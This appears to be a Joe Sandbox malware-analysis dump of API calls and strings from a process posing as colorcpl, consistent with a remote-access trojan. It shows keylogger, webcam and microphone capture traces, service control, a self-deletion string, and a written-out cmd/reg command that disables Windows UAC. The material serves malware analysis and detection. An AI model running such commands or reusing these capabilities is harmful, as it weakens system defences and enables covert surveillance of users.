                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A6B
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A7F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A8C
                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98A9B
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98AAD
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A985D9,00000000), ref: 04A98AB0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BD6
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BEA
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98BF7
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C06
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C18
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A984D9,00000000), ref: 04A98C1B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B6F
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B83
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B90
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,04A98559,00000000), ref: 04A98B9F
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98BB1
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,04A98559,00000000), ref: 04A98BB4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Service$CloseHandle$Open$ControlManager
                                        • String ID:
                                        • API String ID: 221034970-0
                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,04A98656,00000000), ref: 04A98A09
                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,04A98656,00000000), ref: 04A98A1E
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A2B
                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,04A98656,00000000), ref: 04A98A36
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A48
                                        • CloseServiceHandle.ADVAPI32(00000000,?,04A98656,00000000), ref: 04A98A4B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                        • String ID:
                                        • API String ID: 276877138-0
                                        APIs
                                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 04A8A0BE
                                        • wsprintfW.USER32 ref: 04A8A13F
                                          • Part of subcall function 04A8962E: SetEvent.KERNEL32(?,?,00000000,04A8A156,00000000), ref: 04A8965A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 1497725170-248792730
                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 04A9B310
                                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 04A9B32B
                                        • GetLastError.KERNEL32 ref: 04A9B335
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E547
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E556
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,04AF1FFC), ref: 04A8E55B
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 04A8E53D
                                        • C:\Windows\System32\cmd.exe, xrefs: 04A8E542
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                        • API String ID: 2922976086-4183131282
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,04AC07EB,00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002), ref: 04AC085A
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 04AC086D
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,04AC07EB,00000003,?,04AC078B,00000003,04AEB4F8,0000000C,04AC08E2,00000003,00000002,00000000), ref: 04AC0890
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,04AF1E90,04A84E5A,00000001,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85100
                                        • SetEvent.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A8510C
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85117
                                        • CloseHandle.KERNEL32(?,?,00000000,04AF1E90,04A84C88,00000000,?,?,00000000), ref: 04A85120
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        • Connection KeepAlive | Disabled, xrefs: 04A850D9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: Connection KeepAlive | Disabled
                                        • API String ID: 2993684571-3818284553
                                        APIs
                                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 04A813FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A81403
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetCursorInfo$User32.dll$`#v
                                        • API String ID: 1646373207-1032071883
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        APIs
                                        • Sleep.KERNEL32(00000000,04A8BE20), ref: 04A844A4
                                          • Part of subcall function 04A845E7: __EH_prolog.LIBCMT ref: 04A845EC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: H_prologSleep
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3469354165-3547787478
                                        APIs
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • _free.LIBCMT ref: 04AC2318
                                        • _free.LIBCMT ref: 04AC232F
                                        • _free.LIBCMT ref: 04AC234E
                                        • _free.LIBCMT ref: 04AC2369
                                        • _free.LIBCMT ref: 04AC2380
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: _free$AllocateHeap
                                        • String ID:
                                        • API String ID: 3033488037-0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        APIs
                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,04ADC1E4), ref: 04AC68FE
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF754,000000FF,00000000,0000003F,00000000,?,?), ref: 04AC6976
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,04AEF7A8,000000FF,?,0000003F,00000000,?), ref: 04AC69A3
                                        • _free.LIBCMT ref: 04AC68EC
                                          • Part of subcall function 04AC3C92: HeapFree.KERNEL32(00000000,00000000,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?), ref: 04AC3CA8
                                          • Part of subcall function 04AC3C92: GetLastError.KERNEL32(?,?,04ACDE4F,?,00000000,?,00000000,?,04ACE0F3,?,00000007,?,?,04ACE63E,?,?), ref: 04AC3CBA
                                        • _free.LIBCMT ref: 04AC6AB8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                        • String ID:
                                        • API String ID: 1286116820-0
                                        APIs
                                        • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5,00000000,00000000,00000000,00000000,00000000), ref: 04AC7799
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 04AC7855
                                        • WriteFile.KERNEL32(?,00000000,00000000,04AC7ECC,00000000,?,?,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5), ref: 04AC7874
                                        • WriteFile.KERNEL32(?,04AD3EB5,00000001,04AC7ECC,00000000,?,?,?,?,?,?,?,?,?,04AC7ECC,04AD3EB5), ref: 04AC78AD
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        • API ID: FileWrite$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 977765425-0
                                        APIs
                                          • Part of subcall function 04A99F23: GetCurrentProcess.KERNEL32(?,?,?,04A8C663,WinDir,00000000,00000000), ref: 04A99F34
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A8E305
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 04A8E329
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8E338
                                        • CloseHandle.KERNEL32(00000000), ref: 04A8E4EF
                                          • Part of subcall function 04A99F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,04A8DFB9,00000000,?,?,00000001), ref: 04A99F66
                                          • Part of subcall function 04A99F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 04A99F9C
                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 04A8E4E0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 1735047541-0
                                        • Opcode ID: ab6834da6539abb13b446dc0a820ae20ae3c1d5ed8ffb3503109102890890bf9
                                        • Instruction ID: 6f4a487ac5cb6db554adfd0ade1303c8baa0fa940e8b4d56de265ba478b1b379
                                        • Opcode Fuzzy Hash: ab6834da6539abb13b446dc0a820ae20ae3c1d5ed8ffb3503109102890890bf9
                                        • Instruction Fuzzy Hash: 2F41EF715092409BE325FB60DA90AEFB3E9EFE4304F50492DE48A861D1EF34BD4BC652
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f7930abd4b555a31a5c4b16cb1cbf37ae91daeacf4f1122b21ba6bd8d10f7016
                                        • Instruction ID: a62bc431d6bc925d3507a24a16f5f41186ab1021d4aaf61120d196b5d0d30174
                                        • Opcode Fuzzy Hash: f7930abd4b555a31a5c4b16cb1cbf37ae91daeacf4f1122b21ba6bd8d10f7016
                                        • Instruction Fuzzy Hash: 5B41D132F002009FDB54DFB8C984A9EB7B5EF85718B1585ADE955EB342EB31B901CB80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                        • Instruction ID: d11f669e690c862b4a487bf107c99908c08537841c7b7d048edd6eccc8b3a2cc
                                        • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                        • Instruction Fuzzy Hash: A241E436E002089FDB54DF78CC84A6EB7F5EF89714F254569D625EF780E632AA41CB80
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __dosmaperr$_free
                                        • String ID:
                                        • API String ID: 242264518-0
                                        • Opcode ID: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                        • Instruction ID: 48cb9263df48b4ea1d6bbd3a0be8fcff20b84714904f9b20686752eedea72875
                                        • Opcode Fuzzy Hash: 483cb59b05aae7222e8dd9b47b4a98874ada728b8e202fcd2bd4ef1ccfd8c6c3
                                        • Instruction Fuzzy Hash: 14319F7280121ABFEF91AFA4DC849AE3B6CEF44270F214169F834979D5DB32C910CB61
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,04AB9ED1,?,00000000,?,00000001,?,?,00000001,04AB9ED1,?), ref: 04ACE359
                                        • __alloca_probe_16.LIBCMT ref: 04ACE391
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04ACE3E2
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04AB8C3F,?), ref: 04ACE3F4
                                        • __freea.LIBCMT ref: 04ACE3FD
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: 3ff1624e2eccef58b493df76c5e454ef6e6cd7cae434beb4ddee1d810abc5c2e
                                        • Instruction ID: ddc16f39ef0bea48828ec52307f32b0972a6b947e47121ea0b52b268fcb8c99e
                                        • Opcode Fuzzy Hash: 3ff1624e2eccef58b493df76c5e454ef6e6cd7cae434beb4ddee1d810abc5c2e
                                        • Instruction Fuzzy Hash: 94318D32A0021AABDF259F69DC84DEF7BA5EF40710B04426CEC19DA290E739E951CBD0
                                        APIs
                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04A81BD9
                                        • waveInOpen.WINMM(04AEFAB0,000000FF,04AEFA98,Function_00001CEB,00000000,00000000,00000024), ref: 04A81C6F
                                        • waveInPrepareHeader.WINMM(04AEFA78,00000020), ref: 04A81CC3
                                        • waveInAddBuffer.WINMM(04AEFA78,00000020), ref: 04A81CD2
                                        • waveInStart.WINMM ref: 04A81CDE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                        • String ID:
                                        • API String ID: 1356121797-0
                                        • Opcode ID: 8327d5fe962b466aecbdb1bc3144b8e8652f17377040cbb9f3c9c0c746186b8b
                                        • Instruction ID: 11d52467b6336de229dc13030fb9318bad5b2d3223524b6611648f26a85d8157
                                        • Opcode Fuzzy Hash: 8327d5fe962b466aecbdb1bc3144b8e8652f17377040cbb9f3c9c0c746186b8b
                                        • Instruction Fuzzy Hash: 01212A72600640BFD714AF67F9089267BA9FBB8714780842EF126DF6A0DB7C5C03AB44
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 04ACC543
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04ACC566
                                          • Part of subcall function 04AC3649: RtlAllocateHeap.NTDLL(00000000,04AB3069,?,?,04AB65E7,?,?,04AF21E8,?,?,04A8C88A,04AB3069,?,?,?,?), ref: 04AC367B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04ACC58C
                                        • _free.LIBCMT ref: 04ACC59F
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04ACC5AE
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: 24fedeab760b164f1575084803c5fa9e3661fa0a523594487d9fcc7fa5a041be
                                        • Instruction ID: e7e1e25053e59dcbd7e36fe6713972107cded90799c764265e2f40e443ffaa2e
                                        • Opcode Fuzzy Hash: 24fedeab760b164f1575084803c5fa9e3661fa0a523594487d9fcc7fa5a041be
                                        • Instruction Fuzzy Hash: AC018472A422197F27611BA75D8CC7F6A6DDACEEB4315016EBD09D7100EE64AD0285B0
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,04AE9654,00000000,00000000,04A8BFB7,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 04A9A1BA
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 04A9A1D7
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A1E3
                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 04A9A1F4
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A201
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreatePointerWrite
                                        • String ID:
                                        • API String ID: 1852769593-0
                                        • Opcode ID: 60ce01e7c56926da22ef63c3068df2ac454bfda3e1f281179d4b502404392e40
                                        • Instruction ID: 4cd94604b32dcc9dc98a8353cf0ae03fbe7d8934249c4458f8b0c64a82bc9498
                                        • Opcode Fuzzy Hash: 60ce01e7c56926da22ef63c3068df2ac454bfda3e1f281179d4b502404392e40
                                        • Instruction Fuzzy Hash: 3011C07130A2547FEB144F28BC88E7B77ECEB86364F20462AF562C61C0D665AC468631
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 04A8FBD5
                                        • int.LIBCPMT ref: 04A8FBE8
                                          • Part of subcall function 04A8CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 04A8CAFA
                                          • Part of subcall function 04A8CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 04A8CB14
                                        • std::_Facet_Register.LIBCPMT ref: 04A8FC28
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 04A8FC31
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 04A8FC4F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID:
                                        • API String ID: 2536120697-0
                                        • Opcode ID: a5874c4925fdd87e3c51dfc0b0fddddee5a1f1bf9d956738a67151d405b7215b
                                        • Instruction ID: 128e5d4d0bef9f20025152d3160576a4f4985511e70382d90931b507436c7d51
                                        • Opcode Fuzzy Hash: a5874c4925fdd87e3c51dfc0b0fddddee5a1f1bf9d956738a67151d405b7215b
                                        • Instruction Fuzzy Hash: 7A11C672900119ABDB14FFA4DA048DEB769DF54624B10055EFD45A7250EE31FE06CBE0
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 068E099A
                                        • int.LIBCPMT ref: 068E09AD
                                          • Part of subcall function 068DD8AE: std::_Lockit::_Lockit.LIBCPMT ref: 068DD8BF
                                          • Part of subcall function 068DD8AE: std::_Lockit::~_Lockit.LIBCPMT ref: 068DD8D9
                                        • std::_Facet_Register.LIBCPMT ref: 068E09ED
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 068E09F6
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068E0A14
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                        • String ID:
                                        • API String ID: 2536120697-0
                                        • Opcode ID: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                        • Instruction ID: aec747cfc75e83b33dd7281945fe0405b2d38003692debdeaee7481c61afde06
                                        • Opcode Fuzzy Hash: e42b24a72f1c346ef2fbe1d3cf240902612692734d8aa84a6b4d17056c7d6fbb
                                        • Instruction Fuzzy Hash: A2110A72D04118ABCB90FFA8DC048EE7778DF40660F10495AE954EB290DB709E41C7D1
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 06908EDB
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 06908EF4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                        • Instruction ID: 06a9e60277da5151797634e608c5b5000c0016d641162dc6c09b35d0d2e7e43c
                                        • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                        • Instruction Fuzzy Hash: A301283671D3212EBFD43BB57C455262E8EDB45670B30033AE334498E0FF91480161C9
                                        APIs
                                        • GetLastError.KERNEL32(?,00000000,00000000,04AB9A11,00000000,?,?,04AB9A95,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04AC57AE
                                        • _free.LIBCMT ref: 04AC57E3
                                        • _free.LIBCMT ref: 04AC580A
                                        • SetLastError.KERNEL32(00000000,pth_unenc,04A8E1EC), ref: 04AC5817
                                        • SetLastError.KERNEL32(00000000,pth_unenc,04A8E1EC), ref: 04AC5820
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 55122e2d23f81df8cda05c96327ccd3d5cb204916b1047da7ddda3a73c673bd5
                                        • Instruction ID: a4b1036e164ab672f08522bbdd7af618d041a6e87cb399321c731c8cd2a60fb8
